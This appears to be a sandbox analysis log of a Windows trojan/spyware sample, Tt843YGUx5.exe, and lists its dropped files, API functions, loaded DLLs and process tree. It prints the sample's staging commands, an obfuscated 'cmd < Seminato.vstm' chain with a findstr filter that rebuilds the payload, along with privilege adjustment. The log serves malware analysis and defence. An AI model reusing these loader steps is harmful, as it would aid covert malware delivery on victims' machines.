Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A59C807_2_00A59C80
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A723F57_2_00A723F5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AD84007_2_00AD8400
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A865027_2_00A86502
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A5E6F07_2_00A5E6F0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A8265E7_2_00A8265E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7282A7_2_00A7282A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A889BF7_2_00A889BF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AD0A3A7_2_00AD0A3A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A86A747_2_00A86A74
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A60BE07_2_00A60BE0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AAEDB27_2_00AAEDB2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7CD517_2_00A7CD51
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AD0EB77_2_00AD0EB7
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AB8E447_2_00AB8E44
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A86FE67_2_00A86FE6
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A733B77_2_00A733B7
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7F4097_2_00A7F409
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A6D45D7_2_00A6D45D
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A5F6A07_2_00A5F6A0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A716B47_2_00A716B4
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A6F6287_2_00A6F628
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A516637_2_00A51663
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A778C37_2_00A778C3
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7DBA57_2_00A7DBA5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A71BA87_2_00A71BA8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A89CE57_2_00A89CE5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A6DD287_2_00A6DD28
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A71FC07_2_00A71FC0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7BFD67_2_00A7BFD6
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003DB02011_2_003DB020
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003D94E011_2_003D94E0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003D9C8011_2_003D9C80
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003F23F511_2_003F23F5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0045840011_2_00458400
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0040650211_2_00406502
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0040265E11_2_0040265E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003DE6F011_2_003DE6F0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003F282A11_2_003F282A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_004089BF11_2_004089BF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00406A7411_2_00406A74
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00450A3A11_2_00450A3A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003E0BE011_2_003E0BE0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003FCD5111_2_003FCD51
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0042EDB211_2_0042EDB2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00438E4411_2_00438E44
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00450EB711_2_00450EB7
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00406FE611_2_00406FE6
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003F33B711_2_003F33B7
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003FF40911_2_003FF409
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003ED45D11_2_003ED45D
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003EF62811_2_003EF628
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003D166311_2_003D1663
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003F16B411_2_003F16B4
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003DF6A011_2_003DF6A0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003F78C311_2_003F78C3
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003F1BA811_2_003F1BA8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003FDBA511_2_003FDBA5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00409CE511_2_00409CE5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003EDD2811_2_003EDD28
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003FBFD611_2_003FBFD6
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003F1FC011_2_003F1FC0
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: String function: 00A70D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: String function: 00A61A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: String function: 00A78B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: String function: 00788B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: String function: 00771A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: String function: 00780D17 appears 70 times
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: String function: 0040346A appears 45 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: String function: 003E1A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: String function: 003F0D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: String function: 003F8B30 appears 42 times
Source: Tt843YGUx5.exe, 00000000.00000002.2108031796.0000000000571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Tt843YGUx5.exe
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs Tt843YGUx5.exe
Source: Tt843YGUx5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Tt843YGUx5.exe, 00000000.00000002.2108031796.000000000051E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBP)T
Source: classification engineClassification label: mal80.troj.spyw.evad.winEXE@26/14@3/1
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00408E97 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00408E97
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007B8DE9 AdjustTokenPrivileges,CloseHandle,5_2_007B8DE9
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007B9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,5_2_007B9399
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AA8DE9 AdjustTokenPrivileges,CloseHandle,7_2_00AA8DE9
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AA9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,7_2_00AA9399
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00428DE9 AdjustTokenPrivileges,CloseHandle,11_2_00428DE9
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00429399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00429399
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00401268 GetDiskFreeSpaceExW,SendMessageW,0_2_00401268
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,5_2_007C4148
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00408906 GetDlgItem,GetDlgItem,SendMessageW,GetDlgItem,GetWindowLongW,GetDlgItem,SetWindowLongW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow,0_2_00408906
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040220D GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,GetProcAddress,GetProcAddress,wsprintfW,GetProcAddress,0_2_0040220D
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Users\user\Desktop\Tt843YGUx5.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000Jump to behavior
Source: Tt843YGUx5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Tt843YGUx5.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Tt843YGUx5.exeVirustotal: Detection: 31%
Source: Tt843YGUx5.exeReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\Tt843YGUx5.exeFile read: C:\Users\user\Desktop\Tt843YGUx5.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Tt843YGUx5.exe "C:\Users\user\Desktop\Tt843YGUx5.exe"
Source: C:\Users\user\Desktop\Tt843YGUx5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Seminato.vstm
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com Inebriarti.exe.com A
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com Bonta.exe.com m
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com A
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com m
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com Pensiero.exe.com E
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com E
Source: C:\Users\user\Desktop\Tt843YGUx5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Seminato.vstmJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmdJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com Inebriarti.exe.com AJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com Bonta.exe.com mJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com Pensiero.exe.com EJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com mJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com EJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: wsock32.dllJump to behavior
